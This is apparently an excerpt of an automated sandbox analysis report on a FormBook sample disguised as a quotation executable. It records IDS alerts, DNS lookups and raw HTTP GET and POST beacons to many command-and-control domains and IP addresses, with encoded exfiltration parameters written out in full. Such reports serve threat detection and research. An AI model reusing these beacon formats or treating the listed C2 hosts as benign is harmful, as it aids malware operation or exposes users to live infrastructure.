Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49753 -> 76.223.54.146:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49741 -> 172.67.132.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49728 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49784 -> 160.25.166.123:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49755 -> 103.106.67.112:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49744 -> 136.243.64.147:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49738 -> 172.67.132.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49740 -> 172.67.132.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49736 -> 160.25.166.123:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49777 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49765 -> 45.33.23.183:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49748 -> 202.95.11.110:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49779 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49768 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49733 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49758 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49769 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49759 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49756 -> 103.106.67.112:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49778 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49782 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49786 -> 160.25.166.123:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49783 -> 160.25.166.123:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49787 -> 172.67.132.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49781 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49774 -> 199.192.21.169:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49760 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49790 -> 172.67.132.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49754 -> 103.106.67.112:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49750 -> 76.223.54.146:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49762 -> 194.9.94.85:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49775 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49757 -> 103.106.67.112:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49766 -> 45.33.23.183:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49770 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49767 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49773 -> 199.192.21.169:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49788 -> 172.67.132.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49772 -> 199.192.21.169:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49789 -> 172.67.132.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49785 -> 160.25.166.123:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.furrcali.xyz

Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48
Source: Joe Sandbox View	IP Address: 103.106.67.112 103.106.67.112

Source: Joe Sandbox View	ASN Name: GIGAINFRASoftbankBBCorpJP GIGAINFRASoftbankBBCorpJP
Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: VOYAGERNET-AS-APVoyagerInternetLtdNZ VOYAGERNET-AS-APVoyagerInternetLtdNZ

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9

Source: C:\Users\user\Desktop\QUOTATION#050125.exe

Code function: 0_2_004FCE44 InternetReadFile,SetEvent,GetLastError,SetEvent,

0_2_004FCE44

Source: global traffic	HTTP traffic detected: GET /js1x/?cOnShP=YzadGC6YqOgjY/9qwmEESxfA+8MKCZxp0CcLO+Xh8dJmB8CdhvgUA7hRZF2xLQJtMCWb5Kgxi+xGIwqq0R102ShiT2rp0EsU7QKswMKkfsup8/2EYKLr6Ec=&NvA=qUwPQPTQmTwyizTU HTTP/1.1Host: www.milp.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /jwa9/?cOnShP=nbEb6BapjrCYd3vpIU65dRTaoPK2c484Z9DLelTcrJ4p8hOiBplI39ztzhaal76qFYKe8ooJF22mI/JvRPR9KZtEPsGPSZvpHz4gKRb9RHtiv87SZwxMyIk=&NvA=qUwPQPTQmTwyizTU HTTP/1.1Host: www.chiro.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /3u0p/?NvA=qUwPQPTQmTwyizTU&cOnShP=s2YzwEkhsdaL/kJQlHk7A3SE2/Z36REv9AUKdpz0O4EFo1wYmv8+70PTeuLpJbel1HoKntoiuCCwLjgxW1UIuCv8mzvY6w9FRbC+/5arF9GGIcX7zSRGFgQ= HTTP/1.1Host: www.mzkd6gp5.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /qps0/?cOnShP=oe/Nf5ZxPavzyNCK1vJM2Ozzw7iHMrsFQb4gcz6uUjnOuiLJkTwk1EFGD/G87FIa6dxrZOgAQGccmvtK4ohyPgEShywSULdIISv/2gmVOP/g7WXCZMIn3pc=&NvA=qUwPQPTQmTwyizTU HTTP/1.1Host: www.bokus.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /nkmx/?cOnShP=eUQnbnMYY/LCOqGESTL4TQrP6i0At1UjsamtmjAjCJYjPTSalXudwPcRr9EknZYtOZpCljWDkwtbq6MUXcKSC+3UVsfypEs97CYth90fPOn8W2O2KjrJHqc=&NvA=qUwPQPTQmTwyizTU HTTP/1.1Host: www.givvjn.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /t3iv/?NvA=qUwPQPTQmTwyizTU&cOnShP=P136bSYw/boin6utEBZ7PLC682DYGQHk9qKLeTmXrWAePyaHTSDMFoauBTWx0ig1S3CVFsx30iUtjRVQiBy55I3Yp99Gh3kk8H5H2AEMqkWB6gkiSHADwPc= HTTP/1.1Host: www.bonheur.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /bwjl/?cOnShP=DlXUXSIcZnIsgzl0u4NtOaZFY3Bzu0GepY2CMnKH5/Z+wLXeqyLz34dEMj2dm6NLuVk54f0N3OpI5VHZ7BJAsS5zdqtXFQ+nWWO+v3ILJktUUuvXcybstOw=&NvA=qUwPQPTQmTwyizTU HTTP/1.1Host: www.rpa.asiaAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /kj1o/?NvA=qUwPQPTQmTwyizTU&cOnShP=aFAzn/LT2mOAaNQHP98soQbFSeChigB+MmjNXW9rGStYTR2loNwIsxAevG8AaM/8DgC1YrG7rp0i0fn4DlXpdNAv+6uTj4+oUBXQskl/LrNJEccoBVqSJKs= HTTP/1.1Host: www.ogbos88.cyouAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /cxj4/?NvA=qUwPQPTQmTwyizTU&cOnShP=gKtC9mpNHTkTr00OOrlul8C1Q+DXvNuoM8EbXMKNjeYmEZtcGajyBctrWO6oEHOoogFTlfS8+DNQw55D2MfCqAhjIjNgZ6kwkHLqILyFVQkk3fe4uC3E7DA= HTTP/1.1Host: www.100millionjobs.africaAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /wbfy/?cOnShP=Xeeb3ImT6ZQQytgHl6ygbKjk3RvUis2KlqPkukVQbKRvaGCiHgrQQJpKPHE9m9OFKl001Zh7fqviaNy8QasigmVtVgrnFrjMGvUSPQegMjeyq5uNXxHJj0c=&NvA=qUwPQPTQmTwyizTU HTTP/1.1Host: www.mirenzhibo.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /kgjj/?NvA=qUwPQPTQmTwyizTU&cOnShP=m0PzV+DL9MdhQie6uq/amrvVR35Q8Tf/lotYUX+AhjMoQA7F3K3FjPv8kV/QBw/PdU/OXM/ri/IbrFYG4xypiABwnaSWREGU3uu7ZYXkuMLBntBAotkskh0= HTTP/1.1Host: www.nextlevel.financeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /k29t/?cOnShP=mLM4NyV3Rm7LSF62zq3qpsssB1F7jUkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGeygpdsHuHQ6ZT1nZEeE6AzqPDDMRo6XGpuD1XHiaV6xOj1iJ+/0Z9jT4Yg=&NvA=qUwPQPTQmTwyizTU HTTP/1.1Host: www.furrcali.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /w98i/?NvA=qUwPQPTQmTwyizTU&cOnShP=UfwHaNGeM7ohZqxMT1oJCRJMGlT3jOeFYxLhiKeMkeFhJQngpiBu1nR/iO/Vw2KMOuQK2IyXNyNkQANnRhWnyAeSvZ4PYAj0T7gn5XvtXdm/7Udw9aOHtOE= HTTP/1.1Host: www.buyspeechst.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /js1x/?cOnShP=YzadGC6YqOgjY/9qwmEESxfA+8MKCZxp0CcLO+Xh8dJmB8CdhvgUA7hRZF2xLQJtMCWb5Kgxi+xGIwqq0R102ShiT2rp0EsU7QKswMKkfsup8/2EYKLr6Ec=&NvA=qUwPQPTQmTwyizTU HTTP/1.1Host: www.milp.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /jwa9/?cOnShP=nbEb6BapjrCYd3vpIU65dRTaoPK2c484Z9DLelTcrJ4p8hOiBplI39ztzhaal76qFYKe8ooJF22mI/JvRPR9KZtEPsGPSZvpHz4gKRb9RHtiv87SZwxMyIk=&NvA=qUwPQPTQmTwyizTU HTTP/1.1Host: www.chiro.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /3u0p/?NvA=qUwPQPTQmTwyizTU&cOnShP=s2YzwEkhsdaL/kJQlHk7A3SE2/Z36REv9AUKdpz0O4EFo1wYmv8+70PTeuLpJbel1HoKntoiuCCwLjgxW1UIuCv8mzvY6w9FRbC+/5arF9GGIcX7zSRGFgQ= HTTP/1.1Host: www.mzkd6gp5.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /qps0/?cOnShP=oe/Nf5ZxPavzyNCK1vJM2Ozzw7iHMrsFQb4gcz6uUjnOuiLJkTwk1EFGD/G87FIa6dxrZOgAQGccmvtK4ohyPgEShywSULdIISv/2gmVOP/g7WXCZMIn3pc=&NvA=qUwPQPTQmTwyizTU HTTP/1.1Host: www.bokus.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /nkmx/?cOnShP=eUQnbnMYY/LCOqGESTL4TQrP6i0At1UjsamtmjAjCJYjPTSalXudwPcRr9EknZYtOZpCljWDkwtbq6MUXcKSC+3UVsfypEs97CYth90fPOn8W2O2KjrJHqc=&NvA=qUwPQPTQmTwyizTU HTTP/1.1Host: www.givvjn.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /t3iv/?NvA=qUwPQPTQmTwyizTU&cOnShP=P136bSYw/boin6utEBZ7PLC682DYGQHk9qKLeTmXrWAePyaHTSDMFoauBTWx0ig1S3CVFsx30iUtjRVQiBy55I3Yp99Gh3kk8H5H2AEMqkWB6gkiSHADwPc= HTTP/1.1Host: www.bonheur.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /bwjl/?cOnShP=DlXUXSIcZnIsgzl0u4NtOaZFY3Bzu0GepY2CMnKH5/Z+wLXeqyLz34dEMj2dm6NLuVk54f0N3OpI5VHZ7BJAsS5zdqtXFQ+nWWO+v3ILJktUUuvXcybstOw=&NvA=qUwPQPTQmTwyizTU HTTP/1.1Host: www.rpa.asiaAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /kj1o/?NvA=qUwPQPTQmTwyizTU&cOnShP=aFAzn/LT2mOAaNQHP98soQbFSeChigB+MmjNXW9rGStYTR2loNwIsxAevG8AaM/8DgC1YrG7rp0i0fn4DlXpdNAv+6uTj4+oUBXQskl/LrNJEccoBVqSJKs= HTTP/1.1Host: www.ogbos88.cyouAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30

Source: global traffic	DNS traffic detected: DNS query: www.milp.store
Source: global traffic	DNS traffic detected: DNS query: www.chiro.live
Source: global traffic	DNS traffic detected: DNS query: www.mzkd6gp5.top
Source: global traffic	DNS traffic detected: DNS query: www.bokus.site
Source: global traffic	DNS traffic detected: DNS query: www.elettrocoltura.info
Source: global traffic	DNS traffic detected: DNS query: www.givvjn.info
Source: global traffic	DNS traffic detected: DNS query: www.bonheur.tech
Source: global traffic	DNS traffic detected: DNS query: www.rpa.asia
Source: global traffic	DNS traffic detected: DNS query: www.ogbos88.cyou
Source: global traffic	DNS traffic detected: DNS query: www.smartbath.shop
Source: global traffic	DNS traffic detected: DNS query: www.100millionjobs.africa
Source: global traffic	DNS traffic detected: DNS query: www.mirenzhibo.net
Source: global traffic	DNS traffic detected: DNS query: www.nextlevel.finance
Source: global traffic	DNS traffic detected: DNS query: www.furrcali.xyz
Source: global traffic	DNS traffic detected: DNS query: www.buyspeechst.shop
Source: global traffic	DNS traffic detected: DNS query: www.lejgnu.info

Source: unknown

HTTP traffic detected: POST /jwa9/ HTTP/1.1Host: www.chiro.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,enConnection: closeCache-Control: no-cacheContent-Length: 203Content-Type: application/x-www-form-urlencodedOrigin: http://www.chiro.liveReferer: http://www.chiro.live/jwa9/User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30Data Raw: 63 4f 6e 53 68 50 3d 71 5a 73 37 35 31 75 39 68 4a 6a 45 62 31 62 57 4b 43 2f 49 59 6a 66 30 74 63 71 2f 61 71 46 51 5a 65 72 4a 55 45 2b 4d 72 70 30 61 7a 51 6d 75 45 61 6f 4c 2b 76 66 52 72 7a 69 56 36 5a 79 71 4b 70 58 61 2f 35 59 43 4f 6a 57 69 45 49 41 58 48 65 74 2b 58 4b 39 6d 49 63 6d 79 42 62 54 50 4f 52 34 78 58 52 2f 4f 66 30 38 4e 39 65 72 65 45 43 46 4a 79 61 6f 4d 51 48 78 52 6d 42 31 34 35 49 4d 6f 6e 4e 74 73 2b 6a 56 54 79 69 4f 61 43 63 45 4b 68 49 36 77 7a 64 34 78 57 49 34 33 32 56 4b 6e 4d 4d 30 6c 58 56 53 4a 6f 4a 51 5a 33 37 4c 6f 44 49 59 30 2f 43 6e 6b 43 57 72 52 43 67 3d 3d Data Ascii: cOnShP=qZs751u9hJjEb1bWKC/IYjf0tcq/aqFQZerJUE+Mrp0azQmuEaoL+vfRrziV6ZyqKpXa/5YCOjWiEIAXHet+XK9mIcmyBbTPOR4xXR/Of08N9ereECFJyaoMQHxRmB145IMonNts+jVTyiOaCcEKhI6wzd4xWI432VKnMM0lXVSJoJQZ37LoDIY0/CnkCWrRCg==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 07:30:36 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=otQSZtFU0TCQK710aJH0X01cb7MPO4YA0Hoi1m%2B8gbbl3PyOVDiXE4ljQWMBwl8%2FuePKtJdoEZcD4tJhvUfvOSpbGrJaPSnqdmVDsFDI6JVP4AtL1UaT1NSszxbiUniYODP%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff2b90ef8336378-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=118610&min_rtt=118610&rtt_var=59305&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=799&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a Data Ascii: f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 07:30:39 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qmn3JDXp8CWZCSsqPB3pH%2FMEoRG1t8u1ZGJAsKZjQjBraQzhb8bvXAN22jN%2FArTpMzaYkcxzzcBN2UVrUl1hGhXX%2B57UDhag8m12rXX6LPvKVHtg41Bea%2Bi7lc9M4nsTFQvK"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff2b91f79591b67-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=119206&min_rtt=119206&rtt_var=59603&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=819&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 